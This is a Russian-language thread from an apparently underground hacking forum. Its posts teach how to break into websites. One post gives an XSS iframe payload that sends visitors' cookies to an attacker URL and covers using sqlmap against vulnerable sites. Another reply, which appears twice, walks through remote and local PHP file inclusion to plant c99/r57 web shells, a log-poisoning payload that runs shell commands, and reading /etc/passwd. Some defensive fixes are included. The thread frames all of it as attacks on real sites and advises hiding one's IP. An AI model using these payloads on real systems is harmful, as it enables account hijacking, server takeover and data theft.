Способы взлома сайтов

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 4K
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Сейчас я расскажу о настоящих ,рабочих способах атак ,которыми можно взломать сайт :

1) Применение межсайтового скриптинга.

Найдите уязвимый сайт,на котором можно размещать контент. Хороший пример - доска объявлений. Помните, если сайт хорошо защищен, это не сработает.


Перейдите к созданию поста. Вам нужно в тело поста вставить специальный код, собирающий данные тех, кто на него кликнет.
Вы захотите проверить, отсеивает ли система код. Опубликуйте <script...>alert(“test”)</...script> (не забудьте убрать “…”). Если при нажатии на свой пост появляется окно с предупреждением, тогда этот сайт уязвим для атаки.

Создайте и загрузите свой PHP-скрипт ,который будет получать данные
Цель этой атаки - собрать пользовательские данные типа "cookie", хранящие информацию об учетных записях пользователей. Ее можно использовать для входа в их аккаунты на уязвимых веб-сайтах. Вам потребуется php-скрипт, который будет воровать куки вашей цели и перенаправлять их на ваш сайт. Загрузите php-скрипт на веб-сайт, к которому у вас есть доступ и который поддерживает php. Пример кода php-скрипта можно найти в разделе "Примеры".



Опубликуйте JavaScript-код.

Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст.

Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).Введите в тело поста JavaScript-код, который будет воровать куки и отправлять их на ваш сайт. Чтобы сделать пост менее подозрительным и уберечь его от удаления, после кода впишите какой-нибудь текст.

Пример кода будет выглядеть следующим образом: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”ВАШURL/cookiecatcher.php?c=”+document.cookie)><.../iframe> (удалите ...).



Использование полученных куки. После этого можете использовать сохраненные у вас на веб-сайте данные куки для любых целей.


XSS ( Межсайтовый скриптинг ) НЕ ЯВЛЯЕТСЯ СЕРЬЁЗНОЙ УГРОЗОЙ ДЛЯ САЙТА.


2) SQL injection

Взлом сайта путём использования ошибки в коде сайта ,в ходе атаки можно получить все данные из базы данных сайта,пароли ,логины и т.д.

Чтобы не сидеть и не искать вручную на сайте уязвимость можно и нужно использовать вспомогательные программы ,которых в интернете куча,например : Cyd Network , Acunetix Web Vulnerability Scanner.

Также для взлома нам понадобиться программа SQLMAP -
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Находим уязвимую ссылку ,вставляем в программу SQLMAP и ждём пока программа взломает сайт.

В интернете полно уроков,гайдов по взлому сайтов данным способом.

ОТЛИЧНЫЙ СПОСОБ ДЛЯ ВЗЛОМА САЙТА.


Выучите один или несколько языков программирования. Если вы действительно хотите научится взламывать веб-сайты, вам нужно понять принцип работы компьютера и других технологий. Изучите такие языки программирования, как Python или SQL, они позволят вам лучше владеть компьютером и найти слабые места систем.


Изучите язык HTML на базовом уровне. Чтобы взламывать веб-сайты, вам нужно иметь четкое представление о языках html и javascript. Это требует немало времени, но в интернете достаточно бесплатных способов для изучения, поэтому главное - желание, а возможности всегда найдутся


Проконсультируйтесь с "Белыми" хакерами . "Белые" хакеры - это те, кто использует свои знания на благо добра, выявляя уязвимости систем безопасности и делая этим Интернет лучшим местом для всех. Если вы хотите научиться взлому, чтобы использовать его на благо добра или защитить ваш собственный веб-сайт, возможно, вам понадобится консультация "белых" хакеров. Если вы читаете данную тему,значит,Вас интересует взлом сайтов,поэтому можно попробовать выманить у "Белых" хакеров некоторые способы ,которыми они сами пользуются, например под предлогом "Вот вы нашли уязвимость под названием "Название уязвимости" подскажите,что это за уязвимость и как можно в дальнейшем её выявить на других своих проектах. Думаю они подскажут Вам!


Если вы хотите стать хакером, вам предстоит во многом разобраться. На данный момент существует множество дыр в безопасности веб-сайтов и их список пополняется с каждым днем, поэтому вы постоянно должны обучаться.

Поскольку список возможных путей взлома постоянно меняется, вы должны идти в ногу со временем. Если сейчас некоторые сайты хорошо защищены ,это не значит,что завтра не появится уязвимость,с помощью которой взломают эти сайты.

Если вы решили испробовать свои хакерские навыки в реальном мире, не забудьте скрыть свой IP-адрес с помощью программного обеспечения, доступного в сети Интернет.
 
Последнее редактирование:

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Весьма познавательно
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
@RASHER,
@po6oT, можете дополнить тему с PHP :)

PHP - injection

PHP-инъекция (англ. PHP injection) — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне. Потенциально опасными функциями являются:
  • eval(),
  • preg_replace() (с модификатором «e»),
  • require_once(),
  • include_once(),
  • include(),
  • require(),
  • create_function().

PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

Пример кривого кода:
Код:
<?
...
$module = $_GET['module'];
include $module . '.php';
...
?>
С помощью этой ошибки мы можем подставить свой ядовитый код со своего сайта и выполнить инъекцию удаленно - это называется глобальный инклуд.

  • Например имеется сайт
  • Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    foto
  • Подстовляем произвольно буквы вместо foto
  • Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    pidori

и видим ошибку такого плана:

  • Warning: include_once(pidori) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69
  • Warning: include_once() [function.include]: Failed opening 'wert' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69

Это 90% уязвимый сайт.
Подставляем вместо параметра foto линк на наш сайт на народе (сайт недолжен поддерживать php скрипты иначе будет все выполнятся на нашем сайте, а не на сайте жертвы) с заранее залитым веб шелом...

Я используюю c99shell и r57shell...
  • И получается линк такого плана
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
И если все верно то мы получаем веб шелл... Сайт у нас в руках))

Локальный PHP - инклуд

Позволяет злоумышленнику инклудить файлы лежащие на сервере.

Пример кривого кода:

Код:
<?php
   include("include/$file");
?>
С помощью этого бага возможно инклудить т.е читать файлы на серваке... Например на сайте можно загружать файлы с любым разрешением, и мы имеем возможность загрузить свой php код и проинклудить его получив веб шелл, или прочитать логи ошибок сервака, например в лог идут все ошибки 404... мы подставляем в линк сайта свой php код <?php system($_GET[cmd]) ?> и он выдает нам ошибку 404... мы инклудим лог и получаем веб шелл CMD...
  • Пример сайта
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    foto
  • Заменяем
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    qwert и видим ошибку
  • Warning: main(files/content/qwer) [function.main]: failed to open stream: No such file or directory in /home/u3/bmohler/html/index.php on line 38
  • Инклудим файл /etc/passwd -
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    и видим примерно такое
Код:
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $ # root:*:0:0::/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8:News Subsystem:/:/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin bind:*:53:53:Bind
Это мы произвели инклуд /etc/passwd...
Таким же образом можно проинклудить логи ошибок и БД...
Копипаста:k32005:
Видео:
Существует несколько способов защиты от такой атаки:
  • Проверять, не содержит ли переменная $module посторонние символы:
Код:
<?
...
$module = $_GET['module'];
if (strpbrk($module, '.?/:')) die('Blocked');
include $module. '.php';
...
?>
  • Проверять, что $module присвоено одно из допустимых значений:
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
Этот способ является более эффективным, красивым и аккуратным.

  • Прописать каждое значение через if
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
  • Использовать оператор switch:
Код:
<?
...
$module = $_GET['module'];
switch($module){
case 'main': include 'main.php'; break;
case 'about': include 'about.php'; break;
case 'links': include 'links.php'; break;
case 'forum': include 'forum.php'; break;
default: include 'main.php';
}
...
?>
Это решение аналогично решению с if, но имеет более компактную запись.

PHP предоставляет также возможность отключения использования удаленных файлов, это реализуется путём изменения значения опции allow_url_fopen на Off в файле конфигурации сервера php.ini.

Описанная уязвимость представляет высокую опасность для сайта и авторам PHP-скриптов не надо забывать про неё.

 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Хороший гайд. Спасибо
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Можно получить файлы шелл?
или я просто слепой не нашел в теме
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Кто может знает? можно из простого шелла со всеми правами сделать прокси?
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Кто может знает? можно из простого шелла со всеми правами сделать прокси?
Я думаю если и возможно, то только http\https, но socks никак не сделаешь чисто из шелла,хотя я может что то не знаю
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Всем привет я только зашёл на сайт и нечего не понимаю можете мне помочь в этом кому не тркдно
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
@RASHER,

PHP - injection

PHP-инъекция (англ. PHP injection) — один из способов взлома веб-сайтов, работающих на PHP, заключающийся в выполнении постороннего кода на серверной стороне. Потенциально опасными функциями являются:
  • eval(),
  • preg_replace() (с модификатором «e»),
  • require_once(),
  • include_once(),
  • include(),
  • require(),
  • create_function().

PHP-инъекция становится возможной, если входные параметры принимаются и используются без проверки.

Пример кривого кода:
Код:
<?
...
$module = $_GET['module'];
include $module . '.php';
...
?>
С помощью этой ошибки мы можем подставить свой ядовитый код со своего сайта и выполнить инъекцию удаленно - это называется глобальный инклуд.

  • Например имеется сайт
  • Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    foto
  • Подстовляем произвольно буквы вместо foto
  • Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    pidori

и видим ошибку такого плана:

  • Warning: include_once(pidori) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69
  • Warning: include_once() [function.include]: Failed opening 'wert' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69

Это 90% уязвимый сайт.
Подставляем вместо параметра foto линк на наш сайт на народе (сайт недолжен поддерживать php скрипты иначе будет все выполнятся на нашем сайте, а не на сайте жертвы) с заранее залитым веб шелом...

Я используюю c99shell и r57shell...
  • И получается линк такого плана
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
И если все верно то мы получаем веб шелл... Сайт у нас в руках))

Локальный PHP - инклуд

Позволяет злоумышленнику инклудить файлы лежащие на сервере.

Пример кривого кода:

Код:
<?php
   include("include/$file");
?>
С помощью этого бага возможно инклудить т.е читать файлы на серваке... Например на сайте можно загружать файлы с любым разрешением, и мы имеем возможность загрузить свой php код и проинклудить его получив веб шелл, или прочитать логи ошибок сервака, например в лог идут все ошибки 404... мы подставляем в линк сайта свой php код <?php system($_GET[cmd]) ?> и он выдает нам ошибку 404... мы инклудим лог и получаем веб шелл CMD...
  • Пример сайта
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    foto
  • Заменяем
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    qwert и видим ошибку
  • Warning: main(files/content/qwer) [function.main]: failed to open stream: No such file or directory in /home/u3/bmohler/html/index.php on line 38
  • Инклудим файл /etc/passwd -
    Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
    и видим примерно такое
Код:
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $ # root:*:0:0::/root:/usr/local/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin operator:*:2:5:System &:/:/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin news:*:8:8:News Subsystem:/:/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin bind:*:53:53:Bind
Это мы произвели инклуд /etc/passwd...
Таким же образом можно проинклудить логи ошибок и БД...
Копипаста:k32005:
Видео:
Существует несколько способов защиты от такой атаки:
  • Проверять, не содержит ли переменная $module посторонние символы:
Код:
<?
...
$module = $_GET['module'];
if (strpbrk($module, '.?/:')) die('Blocked');
include $module. '.php';
...
?>
  • Проверять, что $module присвоено одно из допустимых значений:
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
Этот способ является более эффективным, красивым и аккуратным.

  • Прописать каждое значение через if
Код:
<?
...
$module = $_GET['module'];
$arr = array('main', 'about', 'links', 'forum');
if (!in_array($module,$arr)) $module = $arr[0];
include $module . '.php';
...
?>
  • Использовать оператор switch:
Код:
<?
...
$module = $_GET['module'];
switch($module){
case 'main': include 'main.php'; break;
case 'about': include 'about.php'; break;
case 'links': include 'links.php'; break;
case 'forum': include 'forum.php'; break;
default: include 'main.php';
}
...
?>
Это решение аналогично решению с if, но имеет более компактную запись.

PHP предоставляет также возможность отключения использования удаленных файлов, это реализуется путём изменения значения опции allow_url_fopen на Off в файле конфигурации сервера php.ini.

Описанная уязвимость представляет высокую опасность для сайта и авторам PHP-скриптов не надо забывать про неё.

Круто
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Есть кто сможет показать это в скайпе как это происходит был бы благадарин.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя